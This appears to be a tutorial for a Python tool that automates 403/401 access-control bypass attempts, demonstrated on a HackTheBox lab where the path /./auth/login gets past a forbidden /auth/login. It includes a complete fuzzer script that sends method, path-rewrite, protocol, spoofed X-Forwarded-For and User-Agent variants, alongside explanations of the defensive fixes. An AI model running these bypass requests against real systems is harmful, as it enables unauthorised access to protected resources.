[TOOL GUIDE] Bypass-http: a Python tool to find 403 & 401 bypasses


Reinhardt

Link to the GitHub repo: here

[image: shell view of the tool running]

Bypass-http is a Python tool written to test multiple 403 & 401 bypass tricks against a target.

403 (Forbidden) and 401 (Unauthorized) are the status codes a server returns when you try to reach a resource you are not allowed to access: 401 means the server wants you to authenticate first, 403 means it knows who you are, or where you come from, and still refuses.

[image: example of a 403 error page]

Unlike the page in the image above, "Access Denied" errors are usually tied to one particular path of the site, such as website.com/admin (see the example at the end of this article).

The most common way to protect such a path is an IP allowlist: only whitelisted addresses may reach the content, and every other IP gets a 403.

Sometimes a 403 or 401 can be bypassed and the content is still reachable. Many tricks exist to achieve this, and the aim of the tool is to run them automatically against a target.

Here are the tricks Bypass-http currently tests; the tool will be kept up to date and further tricks added or refined in the future:

Testing all HTTP methods

Sometimes the 403 rule is only defined for GET requests, so the tool resends the request with a wide range of other HTTP methods.

Path fuzzing

The most common and most effective bypass: rewriting the path in the request, so that an access rule written against the literal path no longer matches while the server still resolves the rewritten path to the same resource.

Downgrading the protocol version

Sometimes switching to an old protocol version (HTTP/0.9, for example) triggers unexpected behaviour in the server, or in the proxy in front of it, and bypasses the 403.

Header fuzzing

Setting headers such as X-Forwarded-Host to values like localhost can get around some protection rules, especially rules enforced by a reverse proxy. Headers of this family (X-Forwarded-For and friends) are also how a proxy passes the real client address along, so a back end that trusts them blindly can be made to see a whitelisted IP.

User-Agent fuzzing

Here the tool downgrades or changes the User-Agent header (the string that identifies your browser or client) to cause unexpected behaviour on the server: some server rules only apply to, or are not compatible with, certain browsers and agents.

usage: bypass_http.py [-h] -i I -a A [-p P] [-v V] [-m M] [-s S]

optional arguments:
  -h, --help  show this help message and exit
  -i I        IP of the target
  -a A        PATH of the target
  -p P        PORT of the target, 80 by default
  -v V        VERSION of the target, HTTPS/2.0 by default
  -m M        METHOD of the initial error, GET by default
  -s S        SECONDS between each request sent, 1 by default

To use the tool you need the IP of the target (if you only have a hostname, resolve it first, for example with dig or nslookup) and the path that returns the Access Denied error. Because the tool connects to the IP directly, the Host header you put in default_headers.txt (see below) must still carry the original hostname and port; otherwise a site served through virtual hosting will not route the request to the right application.

You can also change the port of the target (80 by default), the protocol version (HTTPS/2.0 by default), the HTTP method of the initial request (GET by default) and the delay in seconds between requests (1 by default). Increasing that delay helps avoid 429 Too Many Requests responses from rate limiting.

Keep in mind that the tool opens raw sockets itself, so every request is sent from your own IP address.

Once these are set, copy the headers of the initial request into the default_headers.txt file. Don't forget this step: the tool replays those headers on every attempt.

For this example I'll use the HackTheBox challenge No-Threshold. In this challenge the path /auth/login is forbidden and responds with a 403 error.

Let's intercept the request with the Burp Suite proxy interceptor to look at it.

[image: Burp Suite proxy interceptor showing the intercepted request]

We can see several pieces of information here:

HTTP method: GET
Protocol version: HTTP/1.1
IP: 94.237.62.195
Port: 36517
Default headers:
Host: 94.237.62.195:36517
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Let's put the default headers in the default_headers.txt file:

Now let's run the tool (remember to pass the port and the protocol version, since they differ from the defaults):

python3 bypass_http.py -i 94.237.62.195 -a /auth/login -p 36517 -v HTTP/1.0

After about a minute of testing, the tool finds something:

[image: shell view of the tool's output]

We can see that it got a 200 OK response with the following request:

GET /./auth/login HTTP/1.0
Host: 94.237.62.195:36517
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

So by rewriting the path as /./auth/login we bypass this 403. The likely explanation is a normalisation mismatch: the rule that denies access compares the literal request target against /auth/login, while the component that actually serves the page collapses the ./ segment and resolves /./auth/login to the very same resource. On the defending side the fix is to normalise the path before evaluating access rules, or to enforce them in the application itself rather than through a string match in a front end.
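The five trick families listed earlier and the /./auth/login finding above, as one added example that is not part of the article or of the Bypass-http repository: a miniature fuzzer in Python that builds raw requests for each family (methods, path rewrites, protocol version, headers, User-Agent), sends them over a plain socket the way the tool does, and records which ones come back 200. So that it runs offline, it also starts a small local server that is deliberately built the way the No-Threshold front end appears to behave, a rule that matches the literal string /auth/login in front of a handler that normalises the path, and that additionally trusts a client-supplied X-Forwarded-For so the header trick can be shown too. The server, the allowlist and every function name are constructed for this example; only the target path and the /./auth/login rewrite come from the article. Python 3.8 or later is assumed.

```python
import posixpath
import socket
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import unquote, urlsplit

TRUSTED_IPS = {"127.0.0.1"}  # constructed allowlist that the fake front-end trusts


class VulnerableHandler(BaseHTTPRequestHandler):
    """Constructed target: literal-path rule that trusts X-Forwarded-For, normalising backend."""
    log_message = lambda self, *args: None  # keep the demo quiet

    def do_GET(self):
        xff = self.headers.get("X-Forwarded-For", "").strip()
        if self.path == "/auth/login" and xff not in TRUSTED_IPS:  # the front-end rule
            return self._reply(403, b"Forbidden")
        if posixpath.normpath(unquote(urlsplit(self.path).path)) == "/auth/login":
            return self._reply(200, b"login page")  # backend resolves the rewritten path
        return self._reply(404, b"not found")

    def _reply(self, code, body):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


# The five trick families the article lists, expressed as request mutations.
DEFAULT_HEADERS = {"User-Agent": "Mozilla/5.0", "Connection": "close"}
METHODS = ["POST", "HEAD", "OPTIONS", "PUT", "PATCH"]
VERSIONS = ["HTTP/1.0", "HTTP/0.9"]
HEADER_TRICKS = [("X-Forwarded-For", "127.0.0.1"), ("X-Forwarded-Host", "localhost")]
USER_AGENTS = ["curl/8.0.0", "Googlebot/2.1 (+http://www.google.com/bot.html)"]


def path_variants(path):
    """Rewrites that a literal-string rule misses but a normalising backend still resolves."""
    segs = [s for s in path.split("/") if s]
    if not segs:
        return []
    joined, first = "/".join(segs), segs[0]
    variants = [
        "/./" + joined,                 # the rewrite that worked in the article
        path + "/", path + "/.", path + "?", path + "%20", path + ";/", path.upper(),
        "/" + "//".join(segs),          # doubled slashes
        "/" + first + "/../" + joined,  # step out of the path and back in
        "/" + "/".join([f"%{ord(first[0]):02x}{first[1:]}"] + segs[1:]),  # %-encode a byte
    ] + ["/" + "/".join(segs[:i]) + "/./" + "/".join(segs[i:]) for i in range(1, len(segs))]
    return list(dict.fromkeys(v for v in variants if v != path))


def candidates(path):
    """Yield (label, method, path, version, extra_headers) for every attempt."""
    yield "baseline", "GET", path, "HTTP/1.1", {}
    for m in METHODS:
        yield f"method {m}", m, path, "HTTP/1.1", {}
    for p in path_variants(path):
        yield f"path {p}", "GET", p, "HTTP/1.1", {}
    for v in VERSIONS:
        yield f"version {v}", "GET", path, v, {}
    for name, value in HEADER_TRICKS:
        yield f"header {name}: {value}", "GET", path, "HTTP/1.1", {name: value}
    for ua in USER_AGENTS:
        yield f"user-agent {ua}", "GET", path, "HTTP/1.1", {"User-Agent": ua}


def build_request(method, path, version, host, headers):
    lines = [f"{method} {path} {version}", f"Host: {host}"] + [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def send_raw(host, port, data, timeout=5.0):
    """Plain socket exchange (no client library re-encodes the path); relies on
    Connection: close so the read ends when the server hangs up."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(data)
        response = b""
        while chunk := sock.recv(4096):
            response += chunk
    return response


def parse_status(response):
    """Status code of the first line; None if there is no status line (HTTP/0.9-style reply)."""
    parts = response.split(b"\r\n", 1)[0].split(b" ", 2)
    if not parts[0].startswith(b"HTTP/") or len(parts) < 2 or not parts[1].isdigit():
        return None
    return int(parts[1])


def fuzz_target(host, port, path, delay=1.0):
    """Send every candidate and record its status; delay mirrors the tool's -s option."""
    results = []
    for label, method, p, version, extra in candidates(path):
        request = build_request(method, p, version, f"{host}:{port}", {**DEFAULT_HEADERS, **extra})
        results.append({"trick": label, "request_line": f"{method} {p} {version}",
                        "status": parse_status(send_raw(host, port, request))})
        time.sleep(delay)
    return results


def start_vulnerable_server():
    server = ThreadingHTTPServer(("127.0.0.1", 0), VulnerableHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":  # demo against the constructed local target
    srv, port = start_vulnerable_server()
    print(*[r for r in fuzz_target("127.0.0.1", port, "/auth/login", delay=0) if r["status"] == 200], sep="\n")
```

Run against the constructed server, the 200s are the path rewrites the literal rule misses (/./auth/login as in the article, plus /auth/./login, /auth/../auth/login, /%61uth/login and the trailing-slash forms) and the spoofed X-Forwarded-For; the other methods come back 501 from this server and the changed User-Agent changes nothing. Against a real target keep the delay at 1 second or more, as with the tool's -s option, and treat every 200 as something to confirm by hand, since a rewritten path can also land on a different resource. The defensive reading is the same for both classes of hit: evaluate access rules on the normalised path, and never derive the client address from a header the client can set.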

Let's try it in the browser:

[image: Burp Suite proxy interceptor with the modified request]
[image: Mozilla Firefox showing the page]

It works!

To see more about hacking, follow me on Twitter. Don't hesitate to reach out if you have questions about the tool or want to collaborate on it.
